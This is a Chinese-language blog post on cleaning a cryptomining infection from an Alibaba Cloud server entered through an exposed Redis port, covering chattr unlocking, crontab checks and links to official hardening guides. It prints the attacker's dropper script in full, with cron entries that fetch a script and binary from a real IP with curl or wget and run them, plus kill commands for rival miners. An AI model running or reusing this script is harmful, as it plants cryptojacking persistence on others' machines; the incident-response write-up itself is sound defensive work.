阿里云服务器---排查挖矿病毒
1.背景
记录一次排查挖矿病毒的过程,其实都是按照阿里云官方教程操作,其中有些操作命令需要重点记录下,为后面生产环境做铺垫学习。
重要:经过近一个月的努力,最终还是放弃了,杀之不尽,大家就看看它长啥样就好了,还是重装系统吧,初始化配置!!
2.现象
近期测试服务器有黑客通过redis的6379端口入侵,然后阿里云发送报警信息,然后登录控制台发现以下报警信息:
3.恶意文件删除
原先还担心 /etc/sysguard 是不是系统自带的,后来,检查看了下其他机器/etc目录下,都无此文件。遂放心删除。
rm -rf /etc/sysguard
提示如下:rm: cannot remove ‘sysupdate’: Operation not permitted
不科学啊,我是用root用户登录的,可能是黑客通过rootkit工具进行了处理。
然后查找资料,找到以下几个命令:
(1). lsattr -a 文件名或目录:发现含有 -i , 其表示不能被删除、改名、设定连结、写入或新增数据;
例如:----i--------e-- /etc/sysguard
(2). chattr -i :取消i命令权限
果不其然,撤销之后在删除就可以如愿删除了。
4.再次检查(很重要)
建议立即及时排查系统/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/等目录下是否存在可疑计划任务文件,并加固系统密码。
尤其要注意他们的伪装,比如web,nginx,www ,www-web等等文件,这些肯定有问题!!
5.恶意脚本
如下就是写入的恶意脚本文件,在/var/spool/mail目录,反正/var/spool目录肯定有恶意文件,通过脚本也能看到
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/ozjsfab||/usr/libexec/ozjsfab||/usr/local/bin/ozjsfab||/tmp/ozjsfab||curl -fsSL -m180 http://67.205.164.163:8000/i.sh||wget -q -T180 -O- http://67.205.164.163:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/rootcd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep ozjsfab || rm -rf ozjsfab
if [ ! -f "ozjsfab" ]; thencurl -fsSL -m1800 http://67.205.164.163:8000/static/4011/ddgs.$(uname -m) -o ozjsfab||wget -q -T1800 http://67.205.164.163:8000/static/4011/ddgs.$(uname -m) -O ozjsfab
fi
chmod +x ozjsfab
/usr/bin/ozjsfab||/usr/libexec/ozjsfab||/usr/local/bin/ozjsfab||/tmp/ozjsfabps auxf | grep -v grep | grep ozjsbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa3 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa4 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa5 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa6 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa7 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep ozjsfa8 | awk '{print $2}' | xargs kill -9echo "*/15 * * * * (/usr/bin/ozjsfab||/usr/libexec/ozjsfab||/usr/local/bin/ozjsfab||/tmp/ozjsfab||curl -m180 -fsSL http://67.205.164.163:8000/i.sh||wget -q -T180 -O- http://67.205.164.163:8000/i.sh) | sh" | crontab -
他们很会伪装,比如在/var/spool/cron或/var/spool/cron/crontabs文件中新建一个root文件,让你误以为是系统文件,其实它就是个定时任务文件。我的是这两个目录都有这个root文件,根据文件创建日期也很容易想到是黑客入侵时写入的。
很明显这就是个定时任务文件,通过远程67.205.164.163这个IP下载那个i.sh脚本文件,就可以得到上面那个恶意脚本文件。
果断删除,不含糊。
6.封堵漏洞
可参考阿里云官方介绍文档,牢记:一定要去堵住漏洞,否则还是会被轻易侵入。
https://help.aliyun.com/knowledge_detail/37447.html
https://help.aliyun.com/knowledge_detail/37433.html
最后,排查异常进程,有一点可参考,就是根据被侵入日期和关键词查看是否有异常进程。
ps -p $PID -o lstart
可以输出进程启动时间。
7.病毒文件
阿里云服务器---排查挖矿病毒相关推荐
- 阿里云服务器被挖矿病毒minerd***的解决方法
早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之 ...
- 【云服务器】阿里云服务器遭遇挖矿病毒、被远控的解决方法(亲测有效)
目录 1.阿里云服务器为什么容易被运控,中病毒 2.解决方案(以下只是我个人的理解) 注意:记得重置系统,病毒很难清理干净的 1.阿里云服务器为什么容易被运控,中病毒 相信各位小伙伴们一定也会遇到阿里 ...
- 记一次阿里云服务器中挖矿病毒处理
1.收到阿里云发来的预警短信 [阿里云]尊敬的1*********9:云盾云安全中心检测到您的服务器:1xx.xx.xx.x5(gateway)出现了紧急安全事件:主动连接恶意下载源,建议您立即登录云 ...
- 阿里云服务器中挖矿病毒解决办法(已实践)
1.cpu过高,中病毒了 2.进入Linux连接阿里云服务器 3.使用top命令动态查看cpu占用率 两种情况 1.未发现占用率很高的进程,跳到第七步 2.发现了占用率很高的进程,使用kill -9 ...
- 阿里云服务器中挖矿病毒处理方法,centos7
今天上班,发现公司的服务都没了,进服务器一看,好家伙,top一看,cpu直接飙到百分之80,还是个乱码的进程名称,一看就是挖矿的病毒. 然后我查资料,说是先通过 /proc/pid/exe 找到进程路 ...
- 阿里云服务器被挖矿病毒入侵处理
前言 最近个人阿里云轻量应用服务器cpu一直满负荷运行,原来是被挖矿病毒入侵了,这里记录一下和病毒斗智斗勇的过程. 杀掉进程 top查看进程id 杀死进程 kill -9 11353 杀死进程 清理定 ...
- 【解决阿里云服务器提示挖矿程序风险2022】
解决阿里云服务器提示挖矿程序风险2022-10 搜索删除含system-private相关的所有文件 如图:system-private.... 2.清除定时任务 3.修改文件可执行权限 4.清除路由 ...
- 排查腾讯云服务器被挖矿病毒【pnscan】挟持
一.问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署.今天早上发现腾讯云发来一条报警信息: 看到信息中说到攻击行为,怀疑是否中了病毒,决定排查一下问题. 二.排查过程 首先登录腾讯云 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
最新文章
- Linux常用命令大全-toolfk程序员在线工具网
- SMO学习笔记(三)——效验数据库备份文件
- JSP简单练习-javaBean的简单应用
- jquery的全选和多选操作
- bootstraptable中responsehandle获取数据缺失_Python中的向量化字符串操作
- SQLServer判断循环
- 谷歌浏览器主页_谷歌浏览器客服人工服务电话怎样查询-客服人工服务电话查询方法...
- RHCE培训笔记——Samba
- 解释HTTP中Get和Post。它们有什么区别,哪个使用时更加安全?
- 数据分析知识体系模型
- Win11如何更新BIOS?
- Python 数据结构之二叉树的实现
- 修改、删除word分节符
- 京东云服务器搭建php开发环境
- 天天向上的力量---python持续的力量
- erp仓储管理 java,关于java:ERP仓库管理的操作与设计开源软件诞生20
- Db2 license
- java excel生成_java操作excel表,包括创建、读取、以及修改【via 度娘】
- Android多用户相关命令,android 5.0 创建多用户 双开多开应用(1)(示例代码)
- python画图颜色代码rgb_如何获取matplotlib颜色方案的RGB值?